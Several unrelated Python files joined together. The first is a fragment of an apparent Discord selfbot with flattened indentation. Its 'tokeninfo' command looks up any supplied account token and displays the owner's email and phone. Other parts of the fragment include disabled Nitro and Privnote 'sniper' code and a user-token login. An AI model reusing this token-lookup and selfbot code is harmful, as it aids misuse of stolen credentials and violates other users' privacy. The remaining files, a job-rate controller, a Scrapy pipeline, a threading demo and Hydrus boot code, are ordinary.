@BetterGhost.command(name="purgeself", description="Purge your messages.", usage="purgeself [amount]")
async def purge(ctx, amount: int):
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
for message in history:
if message.author.id == BetterGhost.user.id:
try:
deletedamount+=1
await message.delete()
await asyncio.sleep(1)
except:
pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
@BetterGhost.command(name="lock", description="Lock the command channel.", usage="lock")
async def lock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=False)
if __embedmode__:
embed = discord.Embed(title=f"Channel Locked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Locked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unlock", description="Unlock the command channel.", usage="unlock")
async def unlock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Channel Unlocked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Unlocked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="lockdown", description="Lock the entire server.", usage="lockdown")
async def lockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=False)
channel = await ctx.guild.create_text_channel('lockdown-chat')
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Enabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await channel.send(embed=embed, delete_after=__deletetimeout__)
else:
await channel.send("Server Lockdown Enabled!")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="unlockdown", description="Unlock the entire server.", usage="lockdown")
async def unlockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Disabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Server Lockdown Disabled")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@BetterGhost.command(name="tokeninfo", description="Information about a token.", usage="tokeninfo [token]")
async def tokeninfo(ctx, *, token):
request = requests.get("https://discord.com/api/users/@me", headers={"Authorization": token})
if request.status_code == 200:
request = request.json()
id = request["id"]
username = request["username"]
discriminator = request["discriminator"]
avatar = avatarUrl(id, request["avatar"])
publicflags = request["public_flags"]
bio = request["bio"]
nitro = ""
if "premium_type" in request:
if request["premium_type"] == 0:
nitro = "None"
elif request["premium_type"] == 1:
nitro = "Classic Nitro"
elif request["premium_type"] == 2:
nitro = "Nitro"
else:
nitro = "None"
email = request["email"]
phone = request["phone"]
if bio == "":
bio = " "
if __embedmode__:
embed = discord.Embed(title=user.name + " token information", color=__embedcolour__)
embed.add_field(name="Token", value="```" + str(token) + "```", inline=False)
embed.add_field(name="Username", value="```" + str(username) + "```")
embed.add_field(name="Email", value="```" + str(email) + "```")
embed.add_field(name="Phone", value="```" + str(phone) + "```")
embed.add_field(name="Discriminator", value="```" + str(discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(id) + "```")
embed.add_field(name="Bio", value="```" + str(bio) + "```")
embed.add_field(name="Nitro", value="```" + str(nitro) + "```")
embed.set_thumbnail(url=avatar)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {username}'s token Information ]
Token: {token}
Username: {username}
Email: {email}
Phone: {phone}
Discriminator: {discriminator}
User ID: {id}
Bio: {bio}
Nitro: {nitro}
# {__embedfooter__}```{avatar}""")
else:
await ctx.send("Failed to get information about this token. Probably invalid or from a delete user.")
@BetterGhost.command(name="userinfo", description="Information about the mentioned user.", usage="userinfo [@user]", aliases=["userlookup", "lookupuser"])
async def userinfo(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + " Information", color=__embedcolour__)
embed.add_field(name="Username", value="```" + str(user.name) + "```")
embed.add_field(name="Discriminator", value="```" + str(user.discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(user.id) + "```")
embed.add_field(name="Created At", value="```" + str(user.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {user.name} Information ]
Username: {user.name}
Discriminator: {user.discriminator}
User ID: {user.id}
Created At: {createdAt}
# {__embedfooter__}```{avatarUrl(user.id, user.avatar)}""")
@BetterGhost.command(name="serverinfo", description="Information about the command server.", usage="serverinfo (guild id)", aliases=["lookupserver", "guildinfo", "lookupguild", "serverlookup", "guildlookup"])
async def serverinfo(ctx, guild:int=None):
if guild == None:
server = ctx.message.guild
else:
server = await BetterGhost.fetch_guild(int(guild))
if __embedmode__:
embed = discord.Embed(title=server.name + " Information", color=__embedcolour__)
embed.add_field(name="Name", value="```" + str(server.name) + "```")
embed.add_field(name="Owner", value="```" + str(server.owner) + "```")
try:
embed.add_field(name="Member Count", value="```" + str(server.member_count) + "```")
except:
pass
embed.add_field(name="Server ID", value="```" + str(server.id) + "```")
embed.add_field(name="Created At", value="```" + str(server.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=str(server.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = server.created_at.strftime("%d %B, %Y")
try:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Member Count: {server.member_count}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
except:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
@BetterGhost.command(name="avatar", description="Get the mentioned user's avatar.", usage="avatar [@user]", aliases=["pfp", "profilepicture"])
async def avatar(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + "'s Avatar", color=__embedcolour__)#
embed.set_image(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(avatarUrl(user.id, user.avatar))
@BetterGhost.command(name="servericon", description="Get the server's icon.", usage="servericon", aliases=["guildicon"])
async def servericon(ctx):
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s Icon", color=__embedcolour__)
embed.set_image(url=iconUrl(ctx.guild.id, ctx.guild.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(iconUrl(ctx.guild.id, ctx.guild.icon))
@BetterGhost.command(name="afkmode", description="Toggle afk mode.", usage="afkmode")
async def afkmode(ctx):
global afkMode
afkMode = not afkMode
cfg = Config.getConfig()
cfg["afkmode"]["enabled"] = afkMode
Config.saveConfig(cfg)
if afkMode:
await ctx.send("Afk mode has been enabled.")
else:
await ctx.send("Afk mode has been disabled.")
@BetterGhost.command(name="settings", description="The bot's settings.", usage="settings")
async def settings(ctx):
totalguilds = len(BetterGhost.guilds)
totalcommands = len(BetterGhost.commands) + len(ccmd)
uptime = int(round(time.time() - botStartTime))
uptimeText = str(timedelta(seconds=uptime))
delta_uptime = datetime.now() - BetterGhost.launch_time
hours, remainder = divmod(int(delta_uptime.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
logins = open('data/logins.txt', 'r')
logindata = logins.read()
base64_message = logindata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
logindata_decoded = message_bytes.decode('ascii')
if __embedmode__:
embed = discord.Embed(title=f"Settings", color=__embedcolour__)
embed.add_field(name="Commands", value=f"```{totalcommands}```")
embed.add_field(name="Logins", value=f"```{logindata_decoded}```")
embed.add_field(name="Version", value=f"```{version}```")
embed.add_field(name="Prefix", value=f"```{BetterGhost.command_prefix}```")
embed.add_field(name="Servers", value=f"```{totalguilds}```")
#embed.add_field(name="Uptime", value=f"```{days}d, {hours}h, {minutes}m, {seconds}s```")
embed.add_field(name="Uptime", value=f"```{uptimeText}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Settings ]
Commands: {totalcommands}
Logins: {logindata_decoded}
Version: {version}
Prefix: {BetterGhost.command_prefix}
Servers: {totalguilds}
Uptime: {days}d, {hours}h, {minutes}m, {seconds}s
# {__embedfooter__}```""", delete_after=__deletetimeout__)
'''@BetterGhost.command(name="snipers", description="All snipers.", usage="snipers")
async def snipers(ctx):
if __nitrosniper__ == True:
nitro = "Enabled"
else:
nitro = "Disabled"
if __privnotesniper__ == True:
privnote = "Enabled"
else:
privnote = "Disabled"
if __giveawaysniper__ == True:
giveaway = "Enabled"
else:
giveaway = "Disabled"
try:
embed = discord.Embed(title=f"Snipers", color=__embedcolour__)
embed.add_field(name="Nitro", value=f"```{nitro}```")
embed.add_field(name="Privnote", value=f"```{privnote}```")
embed.add_field(name="Giveaway", value=f"```{giveaway}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Snipers ]
Nitro: {nitro}
Privnote: {privnote}
Giveaway: {giveaway}
# {__embedfooter__}```""", delete_after=__deletetimeout__)'''
@BetterGhost.command(name="playing", description="Set a playing status.", usage="playing [text]")
async def playing(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Game(text), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Playing Status", description=f"Status changed to: Playing {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Playing Status ]
Status changed to: Playing {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="streaming", description="Set a streaming status.", usage="streaming [text]")
async def streaming(ctx, url, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Activity(type=1, name=f"{text}", url=f"{url}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Streaming Status", description=f"Status changed to: Streaming {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Streaming Status ]
Status changed to: Streaming {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="listening", description="Set a listening to status.", usage="listening [text]")
async def listening(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Activity(type=2, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Listening Status", description=f"Status changed to: Listening to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Listening Status ]
Status changed to: Listening to {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="watching", description="Set a watching status.", usage="watching [text]")
async def watching(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await BetterGhost.change_presence(activity=discord.Activity(type=3, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Watching Status", description=f"Status changed to: Watching {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Watching Status ]
Status changed to: Watching {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="clearstatus", description="Clear your status.", usage="clearstatus")
async def clearstatus(ctx):
    """Clear the account's activity while preserving its current online status.

    Bug fix: the original referenced an undefined name `status` (NameError)
    and passed `discord.Activity(type=-1)`, which is not a valid activity
    type; the other status commands fetch the live status first, so do the
    same here, and pass activity=None to actually clear it.
    """
    resp = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__})
    status = resp.json()["status"] if resp.status_code == 200 else "online"
    await BetterGhost.change_presence(activity=None, status=discord.Status.try_value(status))
    try:
        embed = discord.Embed(title=f"Status Cleared", color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    except discord.HTTPException:
        await ctx.send("Status Cleared")
@BetterGhost.command(name="nickname", description="Set your nickname to anything.", usage="nickname [text]")
async def nickname(ctx, *, text):
    """Set the author's nickname in the current guild to `text`."""
    # Bug fix: the original passed the command function object itself
    # (`nick=nickname`) instead of the user-supplied text.
    await ctx.author.edit(nick=text)
    if __embedmode__:
        embed = discord.Embed(title=f"Nickname changed to {text}", color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"Nickname changed to {text}")
    print(fg.cWhite + "")
@BetterGhost.command(name="clearnickname", description="Clear your nickname.", usage="clearnickname")
async def clearnickname(ctx):
    """Reset the author's guild nickname back to their username."""
    await ctx.author.edit(nick="")
    # Plain-text mode: short-circuit before building any embed.
    if not __embedmode__:
        await ctx.send("Nickname cleared")
        return
    embed = discord.Embed(title=f"Nickname cleared", color=__embedcolour__)
    embed.set_thumbnail(url=__embedimage__)
    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
    embed.timestamp = datetime.now()
    await ctx.send(embed=embed, delete_after=__deletetimeout__)
BetterGhost.run(__token__)
# BetterGhostDiscum = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# @BetterGhostDiscum.gateway.command
# def discumevents(resp):
# if resp.event.typing:
# rawevent = resp.raw
# parsedevent = resp.parsed.auto()
# print(rawevent)
# BetterGhostDiscum.gateway.run()
except Exception as e:
if "improper token" in str(e).lower():
print("The Discord token that BetterGhost has been given to use is no longer working or is invalid.")
print("Please put a new token in to the config (config.json).")
else:
print(e)
logging.exception(str(e))
if os.name == "nt":
os.system("pause")
if os.name == "posix":
input("Press enter to close . . .")
|
delay_control.py | import threading, time, queue, collections
from debug_utils import *
class InterJobGenTimeController_ExpAvg_AIMD():
    """AIMD controller for the number of outstanding jobs ("tokens") per server.

    Keeps an exponential moving average of job turnaround time and additively
    increases / multiplicatively decreases `q_len_limit` — the cap on
    outstanding tokens — to keep the average delay under `max_delay`.
    """
    def __init__(self, _id, max_delay, fc_client):
        self._id = _id
        self.max_delay = max_delay
        self.fc_client = fc_client
        self.q_len_limit = 2  # AIMD-controlled cap on outstanding tokens
        self.q_len = 0        # current number of outstanding tokens
        self.q_len_max = 2    # high-water mark; bounds the additive increase
        self.avg_delay = 0    # exp moving average of turnaround time
        self.a = 0.5          # smoothing factor for the moving average
        self.put()  # to put the initial token in sid_q

    def update_common(self, t):  # t: turnaround time
        """Fold turnaround time `t` into the average and adapt q_len_limit."""
        self.q_len = max(0, self.q_len - 1)
        if self.avg_delay == 0:
            self.avg_delay = t
        else:
            self.avg_delay = (1 - self.a)*self.avg_delay + self.a*t
        if self.avg_delay > self.max_delay:
            # Multiplicative decrease when the delay target is violated.
            self.q_len_limit = self.q_len_limit*1/2
            log(WARNING, "reduced q_len_limit; id= {}".format(self._id))
        else:
            if self.q_len_limit < 2*self.q_len_max:
                # Additive increase; sub-linear once the limit exceeds 1.
                self.q_len_limit += 1/self.q_len_limit if self.q_len_limit > 1 else 1
                log(WARNING, "inced q_len_limit; id= {}".format(self._id))
        log(DEBUG, "id= {}".format(self._id), avg_delay=self.avg_delay, max_delay=self.max_delay, q_len_limit=self.q_len_limit, q_len=self.q_len)

    def update_w_result(self, t):
        """Handle a finished job with turnaround time `t`."""
        self.update_common(t)
        if self.q_len == 0 or (self.q_len < self.q_len_limit):
            self.put()
        elif self.q_len_limit < 1:
            # Limit collapsed below one token: send a probe instead of a job
            # so delay measurements keep flowing.  Bug fix: the original
            # tested `== 0`, a value repeated halving never reaches, and
            # passed the undefined name `sid` instead of `self._id`.
            self.fc_client.send_probe(self._id)

    def update_w_probe(self, t):
        """Handle a probe response with turnaround time `t`."""
        self.update_common(t)

    def put(self):
        """Issue one token (schedule one job) for this server id."""
        self.fc_client.put_sid(self._id)
        self.q_len += 1
        self.q_len_max = max(self.q_len_max, self.q_len)
class InterJobGenTimeController_ExpAvg():
    """Paces job generation at the exp-moving-average of observed service times.

    A daemon thread repeatedly waits for the current inter-service-time
    estimate and then puts this controller's id into `fc_client_sid_q`,
    triggering one job submission.
    """
    def __init__(self, _id, fc_client_sid_q):
        self._id = _id
        self.fc_client_sid_q = fc_client_sid_q
        self.inter_serv_time = None  # exp moving average of job service time
        self.a = 0.5                 # smoothing factor
        self.num_jobs_on_fly = 0
        self.on = True
        t = threading.Thread(target=self.run, daemon=True)
        t.start()
        self.put()

    def close(self):
        log(DEBUG, "started")
        self.on = False
        log(DEBUG, "done")

    def run(self):
        """Pacing loop; runs on the daemon thread until close() is called."""
        while self.on:
            if self.inter_serv_time is None:
                # No estimate yet: back off briefly when enough jobs are in
                # flight, otherwise submit right away to get a first sample.
                # Bug fix: the original fell through to
                # time.sleep(self.inter_serv_time) when the estimate was None
                # and few jobs were on the fly, raising TypeError.
                if self.num_jobs_on_fly > 4:
                    time.sleep(0.1)
            else:
                time.sleep(self.inter_serv_time)
            self.put()

    def update_w_result(self, job_serv_time):
        """Fold a finished job's service time into the pacing estimate."""
        log(DEBUG, "started", job_serv_time=job_serv_time)
        self.num_jobs_on_fly -= 1
        if self.inter_serv_time is None:
            self.inter_serv_time = job_serv_time
        else:
            self.inter_serv_time = self.a*job_serv_time + (1 - self.a)*self.inter_serv_time
        log(DEBUG, "done", inter_serv_time=self.inter_serv_time, num_jobs_on_fly=self.num_jobs_on_fly)

    def put(self):
        """Submit one job request for this controller's id."""
        self.num_jobs_on_fly += 1
        self.fc_client_sid_q.put(self._id)
class InterJobGenTimeController_GGn():
    """Paces job generation to hold a target average load on a G/G/n server pool.

    The inter-request time is (windowed avg service time) / (fair share of
    servers) / (target load), re-estimated over the last 100 results.  A
    daemon thread sleeps that long between submissions.
    """
    def __init__(self, sid, fc_client_sid_q, avg_load_target):
        self.sid = sid
        self.fc_client_sid_q = fc_client_sid_q
        self.avg_load_target = avg_load_target
        self.inter_req_time = None  # None until the first result arrives
        self.result_q = collections.deque(maxlen=100)  # sliding result window
        self.cum_serv_time = 0  # running sum of serv_time over result_q
        self.on = True
        self.syncer = queue.Queue()  # blocks run() until the first result
        t = threading.Thread(target=self.run, daemon=True)
        t.start()
    def __repr__(self):
        return "InterJobGenTimeController_GGn(sid= {}, avg_load_target= {})".format(self.sid, self.avg_load_target)
    def close(self):
        """Stop the pacing loop (takes effect at its next wakeup)."""
        log(DEBUG, "started")
        self.on = False
        log(DEBUG, "done")
    def update(self, result):
        """Fold one job result into the windowed estimate; wake run() on the first one."""
        log(DEBUG, "started", inter_req_time=self.inter_req_time, serv_time=result.serv_time)
        self.cum_serv_time += result.serv_time
        if len(self.result_q) == self.result_q.maxlen:
            # Window is full; the append below evicts the oldest entry.
            self.cum_serv_time -= self.result_q[0].serv_time
        self.result_q.append(result)
        should_sync = self.inter_req_time is None
        self.inter_req_time = self.cum_serv_time / len(self.result_q) / result.num_server_fair_share / self.avg_load_target
        if should_sync:
            log(DEBUG, "recved first result")
            self.syncer.put(1)
        log(DEBUG, "done", inter_req_time=self.inter_req_time)
    def run(self):
        """Pacing loop: submit one sid per inter_req_time until close()."""
        log(DEBUG, "started", what=self)
        while self.on:
            if self.inter_req_time is None:
                # Bootstrap: submit one job, then block until update() has
                # produced the first estimate.
                log(DEBUG, "putting first sid", sid=self.sid)
                self.fc_client_sid_q.put(self.sid)
                log(DEBUG, "waiting for first result", sid=self.sid)
                self.syncer.get(block=True)
                self.fc_client_sid_q.put(self.sid)
            else:
                log(DEBUG, "waiting", inter_req_time=self.inter_req_time, sid=self.sid)
                time.sleep(self.inter_req_time)
                self.fc_client_sid_q.put(self.sid)
|
pipelines.py | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import threading
import pymongo
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
from spider.items import DoubanItem, DoubanDetailsItem
from spider.spiders.douban import DoubanSpider
from spider_utils.douban_database import douban_db
class DoubanPipeline:
    """Persists scraped Douban items to the database on a background thread."""

    def process_item(self, item, spider: DoubanSpider):
        """Log the item, kick off an async DB write, and pass the item on."""
        spider.logger.info(f"Got book item: {item.get('title', item.get('douban_id'))}")

        def update_item(item_):
            # Runs on a daemon thread: guard the whole save, not just the log
            # line, so a failing DB write is reported instead of killing the
            # thread silently.  (The original try covered only the log call.)
            try:
                spider.logger.info(f"saving {item_.__class__.__name__} {item_.get('douban_id')}")
                if isinstance(item_, DoubanItem):
                    douban_db.update_item(item_)
                elif isinstance(item_, DoubanDetailsItem):
                    douban_db.update_details(details=item_)
            except Exception as e:
                spider.logger.warning(f"{e.__class__.__name__} {e}")

        threading.Thread(target=update_item, args=(item,), daemon=True).start()
        return item
|
threading_test.py | import threading
def worker1():
    """Print the numbers 1..19999, each on its own line with the '1: ' tag."""
    for n in range(1, 20000):
        print(f'1: {n}')
def worker2():
    """Print the numbers 1..19999, each on its own line with the '2: ' tag."""
    for n in range(1, 20000):
        print(f'2: {n}')
# Launch both workers concurrently; the two counters interleave on stdout.
t1 = threading.Thread(target=worker1)
t2 = threading.Thread(target=worker2)
for t in (t1, t2):
    t.start()
hydrus_client.py | #!/usr/bin/env python3
# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
try:
import os
import argparse
import sys
from hydrus.core import HydrusBoot
HydrusBoot.AddBaseDirToEnvPath()
# initialise Qt here, important it is done early
from hydrus.client.gui import QtPorting as QP
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusLogger
from hydrus.core import HydrusPaths
from hydrus.core import HydrusTemp
argparser = argparse.ArgumentParser( description = 'hydrus network client' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )
argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=256)' )
argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )
argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )
argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )
argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )
argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )
argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )
argparser.add_argument( '--address', metavar='addr', type=str, default="", help='websocket api listening address' )
argparser.add_argument( '--port', metavar='num', type=int, default=47341, help='websocket api listening port' )
argparser.add_argument( '--certfile', metavar='file', type=str, default=None, help='websocket api SSL cert file' )
argparser.add_argument( '--keyfile', metavar='file', type=str, default=None, help='websocket api SSL key file' )
argparser.add_argument( '--access-key', metavar='key', type=str, default=None, help='websocket api access key' )
result = argparser.parse_args()
HG.args = result
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:
if HC.USERPATH_DB_DIR is None:
raise Exception( 'The default db path "{}" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )
db_dir = HC.USERPATH_DB_DIR
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
if not HydrusPaths.DirectoryIsWriteable( db_dir ):
raise Exception( 'The given db path "{}" is not a writeable-to!'.format( db_dir ) )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )
if not os.path.isdir( db_dir ):
raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )
HG.db_journal_mode = result.db_journal_mode
if result.no_wal:
HG.db_journal_mode = 'TRUNCATE'
if result.db_memory_journaling:
HG.db_journal_mode = 'MEMORY'
if result.db_cache_size is not None:
HG.db_cache_size = result.db_cache_size
else:
HG.db_cache_size = 256
if result.db_transaction_commit_period is not None:
HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )
else:
HG.db_transaction_commit_period = 30
if result.db_synchronous_override is not None:
HG.db_synchronous = int( result.db_synchronous_override )
else:
if HG.db_journal_mode == 'WAL':
HG.db_synchronous = 1
else:
HG.db_synchronous = 2
HG.no_db_temp_files = result.no_db_temp_files
HG.boot_debug = result.boot_debug
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
except Exception as e:
try:
HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )
HydrusData.PrintException( e )
except:
pass
import traceback
error_trace = traceback.format_exc()
print( error_trace )
if 'db_dir' in locals() and os.path.exists( db_dir ):
emergency_dir = db_dir
else:
emergency_dir = os.path.expanduser( '~' )
possible_desktop = os.path.join( emergency_dir, 'Desktop' )
if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):
emergency_dir = possible_desktop
